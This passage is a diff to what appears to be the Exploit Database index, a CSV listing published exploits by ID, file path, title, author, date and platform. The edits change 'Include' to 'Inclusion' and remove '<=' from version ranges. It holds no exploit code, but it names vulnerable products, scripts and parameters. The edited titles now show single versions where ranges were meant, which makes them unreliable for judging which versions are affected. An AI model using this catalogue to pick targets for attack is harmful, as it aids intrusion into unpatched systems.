Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34738,platforms/php/webapps/34738.txt,"GejoSoft Image Hosting Community Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 @@ -31301,7 +31301,7 @@ id,file,description,date,author,platform,type,port 34744,platforms/php/webapps/34744.txt,"YourFreeWorld Ultra Classifieds listads.php Multiple Parameter XSS",2009-07-20,Moudi,php,webapps,0 34745,platforms/php/webapps/34745.txt,"YourFreeWorld Ultra Classifieds subclass.php cname Parameter XSS",2009-07-20,Moudi,php,webapps,0 34746,platforms/php/webapps/34746.txt,"Web TV 'chn' Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 -34747,platforms/php/webapps/34747.txt,"LittleSite 0.1 - 'file' Parameter Local File Include",2014-09-23,Eolas_Gadai,php,webapps,0 +34747,platforms/php/webapps/34747.txt,"LittleSite 0.1 - 'file' Parameter Local File Inclusion",2014-09-23,Eolas_Gadai,php,webapps,0 34748,platforms/php/webapps/34748.txt,"Classified Linktrader Script 'addlink.php' SQL Injection",2009-07-21,Moudi,php,webapps,0 34749,platforms/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 - 'admin_index.php' Cross-Site Scripting",2009-07-21,Moudi,php,webapps,0 34752,platforms/windows/dos/34752.c,"WS10 Data Server - SCADA Exploit Overflow PoC",2014-09-24,"Pedro Sánchez",windows,dos,0 @@ -31325,7 +31325,7 @@ id,file,description,date,author,platform,type,port 34770,platforms/php/webapps/34770.txt,"PHP Scripts Now Hangman index.php n Parameter SQL Injection",2009-07-21,Moudi,php,webapps,0 34771,platforms/php/webapps/34771.txt,"PHP Scripts Now Hangman index.php letters Parameter XSS",2009-07-21,Moudi,php,webapps,0 34772,platforms/php/webapps/34772.txt,"Honest Traffic 'msg' Parameter Cross-Site Scripting",2009-07-17,Moudi,php,webapps,0 -34773,platforms/php/webapps/34773.txt,"Horde IMP Webmail <= 4.3.7 - 'fetchmailprefs.php' HTML Injection",2010-09-27,"Moritz Naumann",php,webapps,0 +34773,platforms/php/webapps/34773.txt,"Horde IMP Webmail 4.3.7 - 'fetchmailprefs.php' HTML Injection",2010-09-27,"Moritz Naumann",php,webapps,0 34774,platforms/php/webapps/34774.txt,"Hotscripts Type PHP Clone Script feedback.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0 34775,platforms/php/webapps/34775.txt,"Hotscripts Type PHP Clone Script index.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0 34776,platforms/php/webapps/34776.txt,"Hotscripts Type PHP Clone Script lostpassword.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0 @@ -31342,7 +31342,7 @@ id,file,description,date,author,platform,type,port 34790,platforms/php/webapps/34790.txt,"Pluck 4.6.3 - 'cont1' Parameter HTML Injection",2010-09-29,"High-Tech Bridge SA",php,webapps,0 34791,platforms/php/webapps/34791.txt,"Swinger Club Portal start.php id Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0 34792,platforms/php/webapps/34792.txt,"Swinger Club Portal start.php go Parameter Remote File Inclusion",2009-07-07,Moudi,php,webapps,0 -34793,platforms/php/webapps/34793.txt,"Top Paidmailer 'home.php' Remote File Include",2009-07-13,Moudi,php,webapps,0 +34793,platforms/php/webapps/34793.txt,"Top Paidmailer 'home.php' Remote File Inclusion",2009-07-13,Moudi,php,webapps,0 34794,platforms/cgi/webapps/34794.txt,"Intellicom Netbiter webSCADA Products 'read.cgi' Multiple Remote Security Vulnerabilities",2010-10-01,"Eugene Salov",cgi,webapps,0 34795,platforms/php/webapps/34795.txt,"WebAsyst Shop-Script 'index.php' Cross-Site Scripting",2009-07-09,Vrs-hCk,php,webapps,0 34796,platforms/multiple/remote/34796.txt,"Oracle MySQL < 5.1.50 - Privilege Escalation",2010-08-03,"Libing Song",multiple,remote,0 @@ -31352,7 +31352,7 @@ id,file,description,date,author,platform,type,port 34798,platforms/php/webapps/34798.txt,"ITS SCADA Username - SQL Injection",2010-10-04,"Eugene Salov",php,webapps,0 34816,platforms/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - File Include",2014-09-29,Vulnerability-Lab,ios,webapps,0 34800,platforms/php/webapps/34800.txt,"Typo3 JobControl 2.14.0 - Cross-Site Scripting / SQL Injection",2014-09-27,"Adler Freiheit",php,webapps,0 -34802,platforms/hardware/remote/34802.html,"Research In Motion BlackBerry Device Software <= 4.7.1 - Cross Domain Information Disclosure",2010-10-04,"599eme Man",hardware,remote,0 +34802,platforms/hardware/remote/34802.html,"Research In Motion BlackBerry Device Software 4.7.1 - Cross Domain Information Disclosure",2010-10-04,"599eme Man",hardware,remote,0 34809,platforms/php/webapps/34809.txt,"Tausch Ticket Script 3 suchauftraege_user.php userid Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0 34810,platforms/php/webapps/34810.txt,"Tausch Ticket Script 3 vote.php descr Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0 34811,platforms/php/webapps/34811.txt,"Linea21 1.2.1 - 'search' Parameter Cross-Site Scripting",2009-07-08,"599eme Man",php,webapps,0 @@ -31376,19 +31376,19 @@ id,file,description,date,author,platform,type,port 34834,platforms/jsp/webapps/34834.txt,"Oracle Fusion Middleware 10.1.2/10.1.3 BPEL Console Cross-Site Scripting",2010-10-12,"Alexander Polyakov",jsp,webapps,0 34835,platforms/windows/remote/34835.py,"e2eSoft VCam DLL Loading Arbitrary Code Execution",2010-10-12,anT!-Tr0J4n,windows,remote,0 34836,platforms/windows/remote/34836.py,"Notepad++ 5.8.2 - 'libtidy.dll' DLL Loading Arbitrary Code Execution",2010-10-12,anT!-Tr0J4n,windows,remote,0 -34837,platforms/php/webapps/34837.txt,"Joomla! 'com_jstore' Component - 'controller' Parameter Local File Include",2010-10-13,jos_ali_joe,php,webapps,0 +34837,platforms/php/webapps/34837.txt,"Joomla! 'com_jstore' Component - 'controller' Parameter Local File Inclusion",2010-10-13,jos_ali_joe,php,webapps,0 34838,platforms/windows/remote/34838.c,"Torrent DVD Creator 'quserex.dll' DLL Loading Arbitrary Code Execution",2010-10-13,anT!-Tr0J4n,windows,remote,0 34839,platforms/cgi/webapps/34839.py,"IPFire Cgi Web Interface Authenticated Bash Environment Variable Code Injection Exploit",2014-10-01,"Claudio Viviani",cgi,webapps,0 34840,platforms/php/webapps/34840.txt,"Ronny CMS 1.1 r935 - Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0 34841,platforms/php/webapps/34841.txt,"PluXml 5.0.1 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0 -34842,platforms/php/webapps/34842.txt,"TWiki <= 5.0 bin/view rev Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0 -34843,platforms/php/webapps/34843.txt,"TWiki <= 5.0 bin/login Multiple Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0 +34842,platforms/php/webapps/34842.txt,"TWiki 5.0 bin/view rev Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0 +34843,platforms/php/webapps/34843.txt,"TWiki 5.0 bin/login Multiple Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0 34844,platforms/windows/remote/34844.c,"STDU Explorer 1.0.201 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2010-10-15,anT!-Tr0J4n,windows,remote,0 34845,platforms/php/webapps/34845.txt,"PHP Photo Vote 1.3F 'page' Parameter Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 34846,platforms/windows/remote/34846.txt,"httpdx 1.4.5 dot Character Remote File Disclosure",2009-10-09,Dr_IDE,windows,remote,0 34847,platforms/php/webapps/34847.txt,"PHP Easy Shopping Cart 3.1R 'subitems.php' Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 34848,platforms/windows/remote/34848.c,"1CLICK DVD Converter 2.1.7.1 - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2010-10-15,anT!-Tr0J4n,windows,remote,0 -34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 - 'req' Parameter Local and Remote File Include Vulnerabilities",2010-01-19,indoushka,php,webapps,0 +34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 - 'req' Parameter Local and Remote File Inclusion Vulnerabilities",2010-01-19,indoushka,php,webapps,0 34850,platforms/php/webapps/34850.txt,"eXV2 CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,php,webapps,0 34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 (joblogs.php jobid param) - SQL Injection",2014-10-02,wishnusakti,php,webapps,80 34852,platforms/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",windows,webapps,80 @@ -31418,7 +31418,7 @@ id,file,description,date,author,platform,type,port 34877,platforms/php/webapps/34877.txt,"DigiOz Guestbook 1.7.2 - 'search.php' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 34878,platforms/php/webapps/34878.txt,"StandAloneArcade 1.1 - 'gamelist.php' Cross-Site Scripting",2009-08-27,Moudi,php,webapps,0 34879,platforms/linux/remote/34879.txt,"OpenVPN 2.2.29 - Remote Exploit (Shellshock)",2014-10-04,"hobbily plunt",linux,remote,0 -34881,platforms/linux/remote/34881.html,"Mozilla Firefox SeaMonkey <= 3.6.10 / Thunderbird <= 3.1.4 - 'document.write' Memory Corruption",2010-10-19,"Alexander Miller",linux,remote,0 +34881,platforms/linux/remote/34881.html,"Mozilla Firefox SeaMonkey 3.6.10 / Thunderbird 3.1.4 - 'document.write' Memory Corruption",2010-10-19,"Alexander Miller",linux,remote,0 34882,platforms/php/webapps/34882.html,"sNews 1.7 - 'snews.php' Cross-Site Scripting and HTML Injection Vulnerabilities",2010-10-19,"High-Tech Bridge SA",php,webapps,0 34883,platforms/php/webapps/34883.txt,"4Site CMS 2.6 - 'cat' Parameter SQL Injection",2010-10-19,"High-Tech Bridge SA",php,webapps,0 34884,platforms/php/webapps/34884.txt,"JCE-Tech SearchFeed Script 'index.php' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 @@ -31436,13 +31436,13 @@ id,file,description,date,author,platform,type,port 34896,platforms/linux/remote/34896.py,"Postfix SMTP 4.2.x < 4.2.48 - Remote Exploit (Shellshock)",2014-10-06,"Phil Blank",linux,remote,0 34922,platforms/php/webapps/34922.txt,"Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0 35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injection Vulnerabilities",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0 -35024,platforms/php/webapps/35024.txt,"Joomla Catalogue Component SQL Injection and Local File Include Vulnerabilities",2010-11-30,XroGuE,php,webapps,0 +35024,platforms/php/webapps/35024.txt,"Joomla Catalogue Component SQL Injection and Local File Inclusion Vulnerabilities",2010-11-30,XroGuE,php,webapps,0 34900,platforms/linux/remote/34900.py,"Apache mod_cgi - Remote Exploit (Shellshock)",2014-10-06,"Federico Galatolo",linux,remote,0 34902,platforms/php/webapps/34902.txt,"PHP Scripts Now Riddles /riddles/results.php searchquery Parameter XSS",2009-08-20,Moudi,php,webapps,0 34903,platforms/php/webapps/34903.txt,"PHP Scripts Now Riddles /riddles/list.php catid Parameter SQL Injection",2009-08-20,Moudi,php,webapps,0 34904,platforms/php/webapps/34904.txt,"Radvision Scopia 'entry/index.jsp' Cross-Site Scripting",2009-08-24,"Francesco Bianchino",php,webapps,0 -34905,platforms/php/webapps/34905.txt,"W-Agora <= 4.2.1 - search.php3 bn Parameter Traversal Local File Inclusion",2010-10-22,MustLive,php,webapps,0 -34906,platforms/php/webapps/34906.txt,"W-Agora <= 4.2.1 - search.php bn Parameter XSS",2010-10-22,MustLive,php,webapps,0 +34905,platforms/php/webapps/34905.txt,"W-Agora 4.2.1 - search.php3 bn Parameter Traversal Local File Inclusion",2010-10-22,MustLive,php,webapps,0 +34906,platforms/php/webapps/34906.txt,"W-Agora 4.2.1 - search.php bn Parameter XSS",2010-10-22,MustLive,php,webapps,0 34907,platforms/multiple/webapps/34907.txt,"IBM Tivoli Access Manager for e-business ivt/ivtserver parm1 Parameter XSS",2010-10-22,IBM,multiple,webapps,0 34908,platforms/multiple/webapps/34908.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/acl method Parameter XSS",2010-10-22,IBM,multiple,webapps,0 34909,platforms/multiple/webapps/34909.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/domain method Parameter XSS",2010-10-22,IBM,multiple,webapps,0 @@ -31467,12 +31467,12 @@ id,file,description,date,author,platform,type,port 34931,platforms/windows/remote/34931.c,"Microsoft Windows VISTA 'lpksetup.exe' 'oci.dll' DLL Loading Arbitrary Code Execution",2010-10-25,"Tyler Borland",windows,remote,0 34932,platforms/linux/remote/34932.html,"NitroView ESM 'ess.pm' Remote Command Execution",2010-10-26,s_n,linux,remote,0 34933,platforms/php/webapps/34933.txt,"FlatNux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0 -34934,platforms/php/webapps/34934.pl,"Joomla! Projects 'com_projects' Component SQL Injection and Local File Include Vulnerabilities",2010-10-27,jos_ali_joe,php,webapps,0 +34934,platforms/php/webapps/34934.pl,"Joomla! Projects 'com_projects' Component SQL Injection and Local File Inclusion Vulnerabilities",2010-10-27,jos_ali_joe,php,webapps,0 34935,platforms/php/webapps/34935.txt,"LES PACKS 'ID' Parameter SQL Injection",2010-10-27,Cru3l.b0y,php,webapps,0 34936,platforms/asp/webapps/34936.txt,"i-Gallery 3.4/4.1 - 'streamfile.asp' Multiple Directory Traversal Vulnerabilities",2009-06-03,"Stefano Angaran",asp,webapps,0 -34937,platforms/php/webapps/34937.txt,"Feindura CMS Groupware Multiple Local File Include and Cross-Site Scripting Vulnerabilities",2010-10-28,Justanotherhacker.com,php,webapps,0 +34937,platforms/php/webapps/34937.txt,"Feindura CMS Groupware Multiple Local File Inclusion and Cross-Site Scripting Vulnerabilities",2010-10-28,Justanotherhacker.com,php,webapps,0 34938,platforms/windows/dos/34938.txt,"Teamspeak 2.0.32.60 Memory Corruption",2010-10-28,"Jokaim and nSense",windows,dos,0 -34939,platforms/php/webapps/34939.txt,"W-Agora 4.1.5 - Local File Include and Cross-Site Scripting Vulnerabilities",2010-10-27,MustLive,php,webapps,0 +34939,platforms/php/webapps/34939.txt,"W-Agora 4.1.5 - Local File Inclusion and Cross-Site Scripting Vulnerabilities",2010-10-27,MustLive,php,webapps,0 34940,platforms/php/webapps/34940.txt,"212cafe WebBoard 2.90 beta - 'view.php' Directory Traversal",2009-05-29,MrDoug,php,webapps,0 34941,platforms/php/webapps/34941.txt,"Intergo Arcade Trade Script 1.0 - 'q' Parameter Cross-Site Scripting",2009-05-25,SmOk3,php,webapps,0 34942,platforms/php/webapps/34942.txt,"Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"dave b",php,webapps,0 @@ -31483,11 +31483,11 @@ id,file,description,date,author,platform,type,port 34947,platforms/php/webapps/34947.txt,"CMS WebManager-Pro 7.4.3 - Cross-Site Scripting and SQL Injection Vulnerabilities",2010-10-30,MustLive,php,webapps,0 34948,platforms/asp/webapps/34948.txt,"Douran Portal 3.9.7.55 - Arbitrary File Upload and Cross-Site Scripting Vulnerabilities",2010-11-01,ITSecTeam,asp,webapps,0 34949,platforms/multiple/remote/34949.py,"BroadWorks Call Detail Record Security Bypass",2010-11-02,"Nick Freeman",multiple,remote,0 -34950,platforms/php/remote/34950.php,"PHP <= 5.3.2 - 'xml_utf8_decode()' UTF-8 Input Validation",2009-05-11,root@80sec.com,php,remote,0 +34950,platforms/php/remote/34950.php,"PHP 5.3.2 - 'xml_utf8_decode()' UTF-8 Input Validation",2009-05-11,root@80sec.com,php,remote,0 34951,platforms/php/webapps/34951.txt,"Online Work Order Suite Login SQL Injection",2010-11-02,VSN,php,webapps,0 34952,platforms/multiple/remote/34952.txt,"Apache Shiro Directory Traversal",2010-11-02,"Luke Taylor",multiple,remote,0 34953,platforms/linux/local/34953.txt,"FUSE fusermount Tool - Race Condition",2010-11-02,halfdog,linux,local,0 -34954,platforms/hardware/local/34954.txt,"Cisco Unified Communications Manager <= 8.0 - Invalid Argument Privilege Escalation",2010-11-03,"Knud Erik Hjgaard",hardware,local,0 +34954,platforms/hardware/local/34954.txt,"Cisco Unified Communications Manager 8.0 - Invalid Argument Privilege Escalation",2010-11-03,"Knud Erik Hjgaard",hardware,local,0 34955,platforms/php/webapps/34955.txt,"Joomla! 1.5.x SQL Error Information Disclosure",2010-11-05,"YGN Ethical Hacker Group",php,webapps,0 34956,platforms/hardware/webapps/34956.txt,"Bosch Security Systems DVR 630/650/670 Series - Multiple Vulnerabilities",2014-10-14,dun,hardware,webapps,0 34957,platforms/ios/webapps/34957.txt,"PayPal Inc BB #85 MB iOS 4.6 - Auth Bypass",2014-10-14,Vulnerability-Lab,ios,webapps,0 @@ -31512,7 +31512,7 @@ id,file,description,date,author,platform,type,port 34982,platforms/win_x86/local/34982.rb,"Microsoft Bluetooth Personal Area Networking - (BthPan.sys) Privilege Escalation",2014-10-15,Metasploit,win_x86,local,0 34994,platforms/cgi/webapps/34994.txt,"OpenWrt 10.03 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-13,"dave b",cgi,webapps,0 34995,platforms/php/webapps/34995.txt,"Simea CMS 'index.php' SQL Injection",2010-11-16,Cru3l.b0y,php,webapps,0 -34984,platforms/php/webapps/34984.py,"Drupal Core <= 7.32 - SQL Injection (1)",2014-10-16,fyukyuk,php,webapps,0 +34984,platforms/php/webapps/34984.py,"Drupal Core 7.32 - SQL Injection (1)",2014-10-16,fyukyuk,php,webapps,0 34985,platforms/php/remote/34985.txt,"pfSense 2 Beta 4 - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-05,"dave b",php,remote,0 34986,platforms/hardware/remote/34986.txt,"D-Link DIR-300 - Multiple Security Bypass Vulnerabilities",2010-11-09,"Karol Celia",hardware,remote,0 34987,platforms/linux/local/34987.c,"Linux Kernel 2.6.x - 'net/core/filter.c' Local Information Disclosure",2010-11-09,"Dan Rosenberg",linux,local,0 @@ -31520,11 +31520,11 @@ id,file,description,date,author,platform,type,port 34989,platforms/php/webapps/34989.txt,"WeBid 0.85P1 - Multiple Input Validation Vulnerabilities",2010-11-10,"John Leitch",php,webapps,0 34990,platforms/php/webapps/34990.txt,"Ricoh Web Image Monitor 2.03 - Cross-Site Scripting",2010-11-09,thelightcosine,php,webapps,0 34996,platforms/php/webapps/34996.txt,"Raised Eyebrow CMS 'venue.php' SQL Injection",2010-11-16,Cru3l.b0y,php,webapps,0 -34992,platforms/php/webapps/34992.txt,"Drupal Core <= 7.32 - SQL Injection (2)",2014-10-17,"Claudio Viviani",php,webapps,0 -34993,platforms/php/webapps/34993.php,"Drupal Core <= 7.32 - SQL Injection (PHP)",2014-10-17,"Dustin Dörr",php,webapps,0 +34992,platforms/php/webapps/34992.txt,"Drupal Core 7.32 - SQL Injection (2)",2014-10-17,"Claudio Viviani",php,webapps,0 +34993,platforms/php/webapps/34993.php,"Drupal Core 7.32 - SQL Injection (PHP)",2014-10-17,"Dustin Dörr",php,webapps,0 34997,platforms/windows/remote/34997.txt,"DServe Multiple Cross-Site Scripting Vulnerabilities",2010-11-16,Axiell,windows,remote,0 -34998,platforms/linux/remote/34998.txt,"Eclipse <= 3.6.1 Help Server help/index.jsp URI XSS",2010-11-16,"Aung Khant",linux,remote,0 -34999,platforms/linux/remote/34999.txt,"Eclipse <= 3.6.1 Help Server help/advanced/content.jsp URI XSS",2010-11-16,"Aung Khant",linux,remote,0 +34998,platforms/linux/remote/34998.txt,"Eclipse 3.6.1 Help Server help/index.jsp URI XSS",2010-11-16,"Aung Khant",linux,remote,0 +34999,platforms/linux/remote/34999.txt,"Eclipse 3.6.1 Help Server help/advanced/content.jsp URI XSS",2010-11-16,"Aung Khant",linux,remote,0 35000,platforms/windows/dos/35000.txt,"SAP Netweaver Enqueue Server - Denial of Service",2014-10-17,"Core Security",windows,dos,3200 35001,platforms/windows/remote/35001.txt,"SAP NetWeaver 7.0 SQL Monitor Multiple Cross-Site Scripting Vulnerabilities",2010-11-17,a.polyakov,windows,remote,0 35002,platforms/windows/remote/35002.html,"VLC Media Player 1.1.x Calling Convention Remote Buffer Overflow",2010-11-02,shinnai,windows,remote,0 @@ -31535,8 +31535,8 @@ id,file,description,date,author,platform,type,port 35007,platforms/windows/remote/35007.c,"Native Instruments Multiple Products - DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",windows,remote,0 35008,platforms/cgi/webapps/35008.txt,"Hot Links SQL 3.2 - 'report.cgi' SQL Injection",2010-11-22,"Aliaksandr Hartsuyeu",cgi,webapps,0 35009,platforms/php/webapps/35009.txt,"AuraCMS 1.62 - 'pdf.php' SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0 -35010,platforms/osx/local/35010.c,"Apple iOS <= 4.0.2 - Networking Packet Filter Rules Local Privilege Escalation",2010-11-22,Apple,osx,local,0 -35011,platforms/linux/remote/35011.txt,"Apache Tomcat <= 7.0.4 - 'sort' and 'orderBy' Parameters Cross-Site Scripting Vulnerabilities",2010-11-22,"Adam Muntner",linux,remote,0 +35010,platforms/osx/local/35010.c,"Apple iOS 4.0.2 - Networking Packet Filter Rules Local Privilege Escalation",2010-11-22,Apple,osx,local,0 +35011,platforms/linux/remote/35011.txt,"Apache Tomcat 7.0.4 - 'sort' and 'orderBy' Parameters Cross-Site Scripting Vulnerabilities",2010-11-22,"Adam Muntner",linux,remote,0 35012,platforms/multiple/webapps/35012.txt,"ZyXEL P-660R-T1 V2 - 'HomeCurrent_Date' Parameter Cross-Site Scripting",2010-11-23,"Usman Saeed",multiple,webapps,0 35014,platforms/hardware/remote/35014.txt,"D-Link DIR-300 WiFi Key Security Bypass",2010-11-24,"Gaurav Saha",hardware,remote,0 35015,platforms/cgi/webapps/35015.txt,"SimpLISTic SQL 2.0 - 'email.cgi' Cross-Site Scripting",2010-11-24,"Aliaksandr Hartsuyeu",cgi,webapps,0 @@ -31571,12 +31571,12 @@ id,file,description,date,author,platform,type,port 35049,platforms/asp/webapps/35049.txt,"Techno Dreams FAQ Manager Package 1.0 - 'faqlist.asp' SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 35050,platforms/php/webapps/35050.txt,"Alguest 1.1 - 'start' Parameter SQL Injection",2010-12-06,"Aliaksandr Hartsuyeu",php,webapps,0 35051,platforms/windows/remote/35051.txt,"Freefloat FTP Server Directory Traversal",2010-12-06,Pr0T3cT10n,windows,remote,0 -35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin - Remote File Inclusion (RFI)",2014-10-25,"Parvinder Bhasin",php,webapps,0 +35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin - Remote File Inclusion",2014-10-25,"Parvinder Bhasin",php,webapps,0 35566,platforms/php/webapps/35566.txt,"Yaws-Wiki 1.88-1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2011-04-04,"Michael Brooks",php,webapps,0 35055,platforms/windows/remote/35055.py,"Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0 35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"XLabs Security",hardware,webapps,0 35057,platforms/php/webapps/35057.py,"Creative Contact Form (WordPress 0.9.7 and Joomla 2.0.0) - Shell Upload",2014-10-25,"Claudio Viviani",php,webapps,0 -35058,platforms/bsd/dos/35058.c,"OpenBSD <= 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0 +35058,platforms/bsd/dos/35058.c,"OpenBSD 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0 40099,platforms/multiple/dos/40099.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (5)",2016-07-13,COSIG,multiple,dos,0 40100,platforms/multiple/dos/40100.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (6)",2016-07-13,COSIG,multiple,dos,0 40101,platforms/multiple/dos/40101.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (7)",2016-07-13,COSIG,multiple,dos,0 @@ -31610,7 +31610,7 @@ id,file,description,date,author,platform,type,port 35084,platforms/php/webapps/35084.txt,"WordPress Twitter Feed Plugin 'url' Parameter - Cross-Site Scripting",2010-12-07,"John Leitch",php,webapps,0 35085,platforms/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro 'showflat.pl' Cross-Site Scripting",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps,0 35086,platforms/multiple/dos/35086.rb,"Allegro RomPager 4.07 - UPnP HTTP Request Remote Denial of Service",2010-12-08,"Ricky-Lee Birtles",multiple,dos,0 -35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 - (stable) 'admin1.template.php' Local and Remote File Include Vulnerabilities",2010-12-09,"Marcin Ressel",php,webapps,0 +35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 - (stable) 'admin1.template.php' Local and Remote File Inclusion Vulnerabilities",2010-12-09,"Marcin Ressel",php,webapps,0 35088,platforms/php/webapps/35088.txt,"PHP State 'id' Parameter SQL Injection",2010-12-09,jos_ali_joe,php,webapps,0 35089,platforms/php/webapps/35089.txt,"Joomla Jeformcr 'id' Parameter SQL Injection",2010-12-09,FL0RiX,php,webapps,0 35090,platforms/php/webapps/35090.txt,"JExtensions Property Finder Component for Joomla! 'sf_id' Parameter SQL Injection",2010-12-10,FL0RiX,php,webapps,0 @@ -31620,7 +31620,7 @@ id,file,description,date,author,platform,type,port 35094,platforms/php/webapps/35094.txt,"slickMsg 0.7-alpha 'top.php' Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0 35095,platforms/linux/remote/35095.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - Multiple HTML Injection Vulnerabilities",2010-12-09,"Yosuke Hasegawa",linux,remote,0 35096,platforms/php/webapps/35096.txt,"Joomla! 'com_mailto' Component Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,MustLive,php,webapps,0 -35097,platforms/php/webapps/35097.txt,"Joomla Redirect Component 1.5.19 - 'com_redirect' Local File Include",2010-12-13,jos_ali_joe,php,webapps,0 +35097,platforms/php/webapps/35097.txt,"Joomla Redirect Component 1.5.19 - 'com_redirect' Local File Inclusion",2010-12-13,jos_ali_joe,php,webapps,0 35098,platforms/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,php,webapps,80 35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XXE File Disclosure",2014-10-28,Portcullis,php,webapps,80 35100,platforms/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80 @@ -31632,7 +31632,7 @@ id,file,description,date,author,platform,type,port 35209,platforms/jsp/webapps/35209.txt,"ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities",2014-11-10,"Pedro Ribeiro",jsp,webapps,0 35106,platforms/php/webapps/35106.txt,"Cetera eCommerce 'banner.php' Cross-Site Scripting",2010-12-11,MustLive,php,webapps,0 35107,platforms/cfm/webapps/35107.txt,"Mura CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-12-13,"Richard Brain",cfm,webapps,0 -35108,platforms/php/webapps/35108.txt,"MyBB <= 1.4.10 - 'tags.php' Cross-Site Scripting",2010-12-12,TEAMELITE,php,webapps,0 +35108,platforms/php/webapps/35108.txt,"MyBB 1.4.10 - 'tags.php' Cross-Site Scripting",2010-12-12,TEAMELITE,php,webapps,0 35109,platforms/php/webapps/35109.txt,"PHP TopSites 2.1 - 'rate.php' Cross-Site Scripting and SQL Injection Vulnerabilities",2010-12-13,"c0de Hunters",php,webapps,0 35110,platforms/php/webapps/35110.txt,"BlogCFC 5.9.6.001 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-14,"Richard Brain",php,webapps,0 35111,platforms/php/webapps/35111.txt,"slickMsg Cross-Site Scripting and HTML Injection Vulnerabilities",2010-12-15,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -31683,9 +31683,9 @@ id,file,description,date,author,platform,type,port 35159,platforms/php/webapps/35159.txt,"Modx CMS 2.2.14 - CSRF Bypass & Reflected XSS & Stored XSS",2014-11-05,"Narendra Bhati",php,webapps,0 35160,platforms/php/webapps/35160.txt,"Mouse Media Script 1.6 - Stored XSS",2014-11-05,"Halil Dalabasmaz",php,webapps,0 35161,platforms/linux/local/35161.c,"Linux Kernel 2.6.39 <= 3.2.2 (x86/x64) - 'Mempodipper.c' Local Root (2)",2012-01-12,zx2c4,linux,local,0 -35162,platforms/linux/dos/35162.cob,"GIMP <= 2.6.7 - Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0 +35162,platforms/linux/dos/35162.cob,"GIMP 2.6.7 - Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0 35163,platforms/windows/dos/35163.c,"ImgBurn 2.4 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-01-01,d3c0der,windows,dos,0 -35164,platforms/php/dos/35164.php,"PHP <= 5.3.2 - 'zend_strtod()' Function Floating-Point Value Denial of Service",2011-01-03,"Rick Regan",php,dos,0 +35164,platforms/php/dos/35164.php,"PHP 